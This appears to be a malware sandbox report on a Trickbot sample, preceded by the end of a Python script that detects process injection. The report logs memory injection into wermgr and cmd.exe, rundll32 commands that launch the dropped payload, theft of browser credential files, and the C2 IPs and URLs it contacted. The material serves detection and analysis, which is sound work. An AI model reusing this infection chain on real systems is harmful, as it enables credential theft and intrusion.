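RUNDLL32_PID, WERMGR_PID, CMD_PID = 1600, 1776, 3068  # 1600 is assumed; the others are in the report
IMAGE_RANGES = {CMD_PID: (0x180000000, 0x100000)}     # assumed x64 cmd.exe image base and size

# Constructed events following the report's alloc/write entries.
SAMPLE_EVENTS = [
    MemEvent("alloc", RUNDLL32_PID, WERMGR_PID, 0x60000, 0x30000, RWX),
    MemEvent("write", RUNDLL32_PID, WERMGR_PID, 0x60000),
    MemEvent("write", RUNDLL32_PID, WERMGR_PID, 0xFFF593F8),   # outside the staged region
    MemEvent("thread", RUNDLL32_PID, WERMGR_PID),              # assumed: not listed in the report
    MemEvent("alloc", WERMGR_PID, CMD_PID, 0x60000, 0x10000, RWX),
    MemEvent("write", WERMGR_PID, CMD_PID, 0x60000),
    MemEvent("write", WERMGR_PID, CMD_PID, 0x1800B5000),       # one byte into cmd.exe's image
    MemEvent("alloc", 4000, WERMGR_PID, 0x200000, 0x1000, RWX),  # allocation only, no payload
    MemEvent("write", CMD_PID, CMD_PID, 0x130000),             # self-write, ignored
]

if __name__ == "__main__":
    for pair, verdict in correlate(SAMPLE_EVENTS, IMAGE_RANGES).items():
        print(pair, verdict)
```

The distinction between "payload-staged" and "code-injection" is the one that matters for response: the first says a region was prepared, the second that the target's control flow now reaches it. In production the same correlation is usually driven from Sysmon Event ID 10 (ProcessAccess, with the granted-access mask) and Event ID 8 (CreateRemoteThread), since Sysmon does not log allocations and writes individually.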
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\wermgr.exe base: 60000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\wermgr.exe base: FFF593F8 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 70000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 49D790B4 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 140000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 70000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 140000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 70000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior (80 further identical entries)
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 180001000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 180001000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 18009A000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 18009A000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1800B5000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1800B5000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1800BA000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1800BA000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 70000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 130000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 140000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 150000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 260000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 70000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 140000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 260000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 280000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 290000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 4B0000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 70000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 70000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 49D790B4 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E70000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 70000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E70000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 70000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E70000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 1E60000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 180001000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 180001000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 18005D000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 18005D000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 180079000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\cmd.exe base: 180079000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW
Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: wermgr.exe, 00000005.00000002.2370606855.0000000000860000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wermgr.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates
Source: C:\Windows\System32\wermgr.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Stealing of Sensitive Information:

Yara detected Trickbot
Source: Yara match File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY
Yara detected Trickbot
Source: Yara match File source: 00000004.00000002.2105353530.0000000002460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2104542682.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.2460000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.2460000.8.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality:

Yara detected Trickbot
Source: Yara match File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY
Yara detected Trickbot
Source: Yara match File source: 00000004.00000002.2105353530.0000000002460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2104542682.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.2460000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.2460000.8.unpack, type: UNPACKEDPE

Behavior Graph:

Behavior Graph ID: 403507  Sample: SecuriteInfo.com.Heur.31681.20936  Startdate: 04/05/2021  Architecture: WINDOWS  Score: 100
Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Multi AV Scanner detection for dropped file; 9 other signatures

  • EXCEL.EXE (started)
      DNS/IP: deluciaspizza.com 144.208.70.30, 443, 49165 IMH-WESTUS United States
      Dropped: C:\Users\user\fndskfnds.dfm (PE32); C:\Users\user\AppData\...\netmouser[1].dll (PE32)
      Signatures: Document exploit detected (creates forbidden files); Document exploit detected (UrlDownloadToFile)
      Starts: rundll32.exe
  • taskeng.exe (started)
      Starts: rundll32.exe
  • rundll32.exe (started by EXCEL.EXE)
      Starts: rundll32.exe
          Signatures: Writes to foreign memory regions; Allocates memory in foreign processes
          Starts: wermgr.exe
  • wermgr.exe (started by the second rundll32.exe)
      DNS/IP: 188.18.7.133, 447, 49170 ROSTELECOM-ASRU Russian Federation; 117.54.250.246, 443, 49167, 49169 INDONET-AS-APINDOInternetPTID Indonesia; 5 other IPs or domains
      Signatures: Hijacks the control flow in another process; May check the online IP address of the machine; Writes to foreign memory regions; 2 other signatures
      Starts: cmd.exe (two instances)
  • cmd.exe (started by wermgr.exe)
      DNS/IP: 103.102.220.50, 443, 49172 ZT-AS-APZohakTechnologyZ-TechAF Afghanistan
      Dropped: C:\Users\user\AppData\Local\...\Web Data.bak (SQLite); C:\Users\user\AppData\...\Login Data.bak (SQLite); C:\Users\user\AppData\Local\...\History.bak (SQLite)
      Signatures: Tries to harvest and steal browser information (history, passwords, etc)

Contacted Public IPs

IP              Domain                                           Country             ASN     ASN Name                         Malicious
144.208.70.30   deluciaspizza.com                                United States       22611   IMH-WESTUS                       false
117.54.250.246  unknown                                          Indonesia           9340    INDONET-AS-APINDOInternetPTID    true
188.18.7.133    unknown                                          Russian Federation  12389   ROSTELECOM-ASRU                  true
103.102.220.50  unknown                                          Afghanistan         137039  ZT-AS-APZohakTechnologyZ-TechAF  false
54.243.154.178  elb097307-934924932.us-east-1.elb.amazonaws.com  United States       14618   AMAZON-AESUS                     false

Contacted Domains

Name IP Active
elb097307-934924932.us-east-1.elb.amazonaws.com 54.243.154.178 true
3.52.17.84.cbl.abuseat.org 127.0.0.2 true
deluciaspizza.com 144.208.70.30 true
3.52.17.84.zen.spamhaus.org unknown unknown
api.ipify.org unknown unknown

Contacted URLs

Name                                                                                   Malicious  Antivirus Detection     Reputation
http://api.ipify.org/?format=text                                                      false      -                       high
https://103.102.220.50:443/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/83/    false      Avira URL Cloud: safe   unknown